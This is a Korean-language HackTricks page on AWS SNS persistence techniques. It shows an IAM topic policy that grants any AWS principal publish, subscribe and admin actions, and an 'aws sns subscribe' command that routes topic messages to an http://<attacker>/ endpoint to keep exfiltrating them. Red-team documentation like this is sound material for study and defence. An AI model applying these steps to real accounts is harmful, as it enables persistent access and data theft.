AWS - SNS Persistence

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

SNS

자세한 정보는 다음을 확인하세요:

pageAWS - SNS Enum

지속성

SNS 주제를 생성할 때, 읽고 쓰기에 누가 접근할 수 있는지 IAM 정책으로 지정해야 합니다. 외부 계정, 역할의 ARN 또는 **"*"**을 지정할 수 있습니다. 다음 정책은 AWS의 모든 사용자가 **MySNS.fifo**라는 SNS 주제에서 읽고 쓸 수 있도록 합니다:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

구독자 생성

모든 주제의 모든 메시지를 계속해서 유출하기 위해 공격자는 모든 주제에 대한 구독자를 생성할 수 있습니다.

주제가 FIFO 유형인 경우에는 SQS 프로토콜을 사용하는 구독자만 사용할 수 있다는 점에 유의하세요.

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新